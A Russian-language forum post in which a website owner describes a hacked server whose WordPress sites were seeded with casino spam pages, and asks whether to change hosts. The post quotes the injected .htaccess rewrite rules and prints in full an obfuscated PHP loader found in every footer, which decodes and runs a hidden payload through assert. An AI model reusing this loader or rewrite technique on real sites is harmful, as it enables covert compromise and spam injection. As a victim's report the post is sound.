Взломан сервер

Доброе время суток.

У меня был взломан сервер не так давно. Взломщик очень интересно использовал мои сайты. На них появились левые страницы с рекламой казино Вулкан(кстати, очень интересно что об этом скажет само казино). Страниц появляется обычно не больше сорока. В итоге человек может попросту не заметить такое «пополнение».

При попытке починить следы проникновения пришел в ужас. Были внесены изменения в .htaccess и в огромное количество файлов и папок. Появились десятки файлов, которые вполне правдоподобно копируют структуру WordPress и носят названия вполне реально существующих файлов.

Пример изменения .htaccess:

RewriteCond %{QUERY_STRING} ^a1=(.*)
RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L]

Строка RewriteCond %{QUERY_STRING} ^a1=(.*) я так понял отвечает за генерацию страницы на сайте жертвы. В URL входит это буквосочетания a1.

Строка RewriteRule ^$ /wp-admin/css/ef/%1 [QSA,L] обращается в свою очередь к папке, которую создал злоумышленник в нормальной директории /wp-admin/css/ в ней находится огромное количество файлов, которые явно не входят в структуру лицензионного оригинального WordPress.

Кроме того, в каждом футере сайтов был прописан следующий код:

<?php $Dh0jnHB="FyEpKPIQcokW7q7XOlxDfZ1XVGTP1Q3CEsngkGtzLA8a90HXR//KxlJK8ce1mGrtAhgf0F5elLnTnmblUb+tgj7BZ102utSpA+u6uey1nJfwUX0dnqnm0R4DP360yBayWAt3f6ZlnbX1AiLfsTGCTj2Kdh1WJlA78kCwdcqLm6u0iAKhvV+/gej3PW9OuVWshM+GkgaplBqrfS4YBfo3MiKF+yiv9LJsv5ZJY6gB3U83imcIAegxymigNhdEKJQ9JPWfL2AtNhdMKL3/xJLh/ViK+gVTBKaCk6ybMglQDq1QX89faddSB079gtZ7sNfsYfMOX0jIw7YDrG128hUmx/vi87keQim6JkCuwz/yiNSNT3DmrEIqqQVNDqLQGiE20ZziILtVOLpsUcP8oEHlcE5qSIfxb/9X5ldgtTvZKDwKpdg7pTUSJiCb9Y8bR4KIu5bbhf+dBlW4ojLOTUfAG9sVb1gTS/9K14O8UarJZOEin4I2C4nM4kzl1voN1h57VnZAvfSeDwCyU23ruzwW0XiYIN5Sq7cK9qVht8BaPOBSRUQP0qVBGUWj+bSzkIK/fcNG03WYKWjM49buwpawd+J5moTdUl3KJwwsXAhK0KxfnzRSs/dg7YP2QGyiTj092ZmiqdYX+HIHbkVnZh021XRjcDEmCuRG2bNMb7r9vwboRSgHQV6/UpNHKyFcAsJ2fRdmlFD0vukJknSeHfsEYbseMPtQwYXDCbgGKD5uiTodeJFjJ0VvVXNniA7PIoytCu6MFlU6WlBxgFW1ZPPcBwAgvkDzwgxSB/E1Z1nRsLVcnCDD5VsxxmLXPUhq1QZjLovRZSMvqzFBUUnbuvfzrqzaOScGVoVSr8NUWo/ZyNgy4sYrY8u7kY3Quia8fZ48/qGLngrXrc3ob4Nybp5siG9goaEictUlPHizcdj+qdQFMoZFH8UM2ZmgorF5aSAfFa4R8VYIzjTcMMyxTX0kTpGYroTPTcaVgm18snCim8UeV6IK8QcmZ5ICxMBkN/ekwtcsf/Wsrc2jc/5mZwO5pATPtqSi9lVt1wkYlVcJ83ASqXWQW5zDAmub0Gl3pOv0PiGZgYH1EzyLFmoSKOdCod8eHlC+NG6+1eawFYN2Wk3+Rp9Y32tVhddwd6NsUUVfXNjLzHfDMjzenlrYbJpRedXtBv3lMTFok1VTA9AxEc5z11ng7M5zYPOPNoJmL3XjKPTJKtPNai45sC7fRqQYzjHUM6nLO6RXxH3735a+Zf4mHjKlGwPT8vre1EJs/Z2OMwRsIUKXk1B1/R1fRg2Qx6oaVe8LiQlP3RNSbrstxNsxnJi5u5s5ej3tktSKW5AX5j+CV/xEtb96pCcLJFUArKO0XQ==";$lrdNj6Us="\x62\x61\x73";$gFctuyg="\x61";$RQMZ8S="Fl1YmASDI3UWZZwX83PlIpxcFiUYZtfg1bNWnIdeyVMJ5Xr";$mMJoXP5="\x73\164";$uMZQ71Pw="\x67\172\x69";$gFctuyg.="\x73";$mMJoXP5.="\x72\x5f\x72";$lrdNj6Us.="\145\x36\x34";$RQMZ8S.="7WqfdXIzeONK6EyxR2lbyyKv4O4LcJnsyS2zbuCv4r0MTzg";$uMZQ71Pw.="\156\x66";$lrdNj6Us.="\x5f\x64\145\143";$uMZQ71Pw.="\x6c\x61";$gFctuyg.="\163\145";$mMJoXP5.="\157\x74";$RQMZ8S.="fnJZBLAbLTEhMjaen2WfjDCqixwPXA/XVHhNKEZSJkzaStp";$mMJoXP5.="\61\x33";$uMZQ71Pw.="\x74\x65";$gFctuyg.="\162\164";$lrdNj6Us.="\x6f\144\145";$RQMZ8S.="LtIpTSIf1uAGJhUIWOQIHc9bjYAQDCXAJQzNnKHAn0O";@$gFctuyg($uMZQ71Pw($lrdNj6Us($mMJoXP5($RQMZ8S))));?>

Масштабы поражения системы просто ужасны. Было потрачено часов восемь, чтобы просто осознать, что все сайты по сути надо удалять и заново заливать. Изменения в структуру CMS внесены очень глобальные и серьезные. И не факт, что я заметил все.

Вопрос в следующем — как вы думаете, следует ли мне поменять хостера? У них все валят на уязвимости в WordPress.

И как мне вообще теперь поступить? Даже восстановив систему, я могу просто получить повторение разрушительного хака.